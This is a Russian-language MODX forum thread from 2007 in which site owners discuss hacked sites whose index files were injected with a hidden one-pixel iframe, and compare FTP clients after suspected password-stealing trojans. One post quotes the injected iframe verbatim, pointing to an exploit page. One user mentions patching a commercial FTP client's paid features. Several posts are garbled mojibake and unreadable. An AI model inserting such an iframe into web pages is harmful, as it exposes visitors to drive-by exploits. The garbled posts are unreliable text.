We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 26085
    • 494 Posts
    Модх тут не причём.

у меня все сайты на модх 6-8 марта взломали. вставили туда в индексные файлы код

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://coco32.org/exp/index.php"></iframe><!-- ~ -->

один сайт на 0922 остальные на 095

Я в панике!!!!!!!!!!!!!!!!!!!!!
      • 33694
      • 742 Posts
      Они все у одного хостера? Это его взломали — протроянили индексы всех сайтов. Не паникуй, это фигня wink
        • 26085
        • 494 Posts
        Да я уже с этим разобрался. МОДХ ту совсем не причём.
        в стативке та же херня
        МОДХ рулллёз
          • 17179
          • 30 Posts
          Ó íàñ òîæå òàêîå áûëî, ñíà÷àëà ñëó÷èëàñü ïàíèêà, ïîòîì ñîîáðàçèëè, ÷òî íå âñå ñàéòû ñëîìàíû, à òîëüêî òå, ÷üè ïàðîëè îêàçàëèñü â TotalCommander, ïðèøëîñü ñðàçó çàìåíèòü âñå ïàðîëè è äåèíñòàëèðîâàòü ïðîãðàììó îò ãðåõà ïîäàëüøå.. Åäèíñòâåííîå, ýòî ãåìîððíî ÷èñòèòü index.html, à îí åñòü ïî÷òè âî âñåõ ïàïêàõ MODx
            • 26085
            • 494 Posts
            Да доло тут не в тотале все популярные фтп манагеры подвержены этой заразе. Причём у меня авп со всеми апдейтами её даже не видет. Как индексы чистили, кстати?
              • 17179
              • 30 Posts
              Quote from: SamZ at Apr 11, 2007, 11:17 PM

Êàê èíäåêñû ÷èñòèëè, êñòàòè?

Äîáðûé äåíü, ÿ ÷èñòèëà âñå âðó÷íóþ, èñêàëà êóñîê êîäà, à ïîòîì ïîëíîñòüþ ïåðåçàëèâàëà âñå èíäåêñû íà ñåðâåðû â êàæäóþ ïàïêó. Õîòåëà ïðîñèòü, ìîæåò åñòü êàêîé äðóãîé âàðèàíò? È êàêîé Ftp ïîñîâåòóåòå, ÷òîáû ïîäîáíîå ìîæíî áûëî èçáåæàòü â äàëüíåéøåì? Ñïàñèáî.
                • 26085
                • 494 Posts
                Как вариант я вообще их поудалял. Нафиг нужны. В апаче ведь и так но индех свойство есть тоесть без них тоже ничего не увидишь. А фтп тут ни в чём не виноват скорее всего так как почти от всех пароли эта дрянь тырит.

п.с. Добро пожаловать в сообщество
                  • 17179
                  • 30 Posts
                  Quote from: SamZ at Apr 17, 2007, 11:53 PM

ï.ñ. Äîáðî ïîæàëîâàòü â ñîîáùåñòâî

Ñïàñèáî îãðîìíîå! ß äóìàþ, òóò íàäîëãî
                    • 19164
                    • 1,215 Posts
                    Последнее время очень часто встречаю такие тревожные сообщения о появлении фреймов в индексных файлах. И судя по всему действительно воруют файлы паролей на фтп. Сам стал жертвой этого еще в феврале, пришлось сменить пароли на двух десятках доменов.

Возникает вопрос - есть ли такие фтп клиенты, которые шифруют свой файл с хранимыми от фтп паролями? На данный момент я остановился на FireFTP, FTP-клиент плагин к FF. Удобен тем что хранит свои пароли в общей базе FF, которая шифруется мастер-паролем. Но после Total Commander к которому так привык за многие годы непривычно.
                      DirectResize 0.9 beta. PHPThumb, sets of configurations, configuration, binded to specific path. No backward compatibility. | DirectResize 0.9. PHPThumb, наборы параметров, параметры, привязанные к определенным путям. Без обратной совместимости.

Unfortunately, DirectResize project is closed. If you want to continue development, PM me for access to project page on Google Code. К сожалению, проект DirectResize закрыт. Если вы желаете продолжить разработки, обращайтесь через ПМ для получения доступа к репозиторию на Google Code.

[PLUGIN] DirectResize - as Maxigallery but for single images :: Download :: [url=http://modxcms.com/forums/index.php/topic,21490]
                      • 33694
                      • 742 Posts
                      И судя по всему действительно воруют файлы паролей на фтп.

Я думаю нужно внести ясность.
                      Если у вас на компе троян, то пароль он может стащить от чего угодно. Другое дело, что кроме протрояненых индексов на вашем сервере, нет видимых проявлений того, что остальными паролями тоже воспользовались. Но сами понимаете, что это вовсе не значит, что этого не происходило или не произойдёт. Это первое.

По поводу FTP клиентов и шифрования.
                      На самом деле они все хоть как-то шифруют пароль (ТС - нет? позор ему!). Но шифруй не шифруй, всё равно получишь x.. всё равно его нужно расшифровывать для передачи ftp серверу. Из этого автоматически следует, что физически всегда имеется возможность расшифровать пароль, нужно только разобраться с алгоритмом шифрования. К слову говоря, с алгоритмами используемыми в самых популярных программах, уже давно разобрались и написали кучу программ для восстановления паролей.
                      Выходом можно считать шифрование с использованием (пользовательского) ключа. Для тех кто не в курсе: пароль шифруется с помощью другого пароля, который, в свою очередь, нигде не храниться или храниться неизвестно где (т.е. чтоб вместе с паролем, троян и его не подхватил, зная, что файл с ключами должен быть где-то рядом). Без ключа, пароль расшифровать невозможно.

А теперь последнее.
                      Вспомнив сколько лет протоколу ftp и глянув его спецификацию, мы узнаем, что пароль в сеть передаётся в открытом виде. Из этого следует, что пусть вы имеете даже самый совершенный ftp клиент, который мастерски шифрует все пароли (и естественно никто не знает как), это всё равное не спасёт ваш пароль от кражи, если кто-то снифит (~перехватывает) ваш траффик.

Продолжая о клиентах.
                      Сам я, перебрав их несколько десятков, считаю лучшим и поэтому выбрал для себя — FTP Rush (ftprush.com). Правда приходится патчить каждую новую версию для исправления одной особенности, но это уже мелочь (я не имею ввиду жадность программы, этот порок само-собой приходится исправлять sad).
                      После TC или FAR особых затруднений в использовании не будет (tab работает как надо wink). Если же вы пользовались исключительно мышью, то вообще никаких сложностей возникнуть не должно.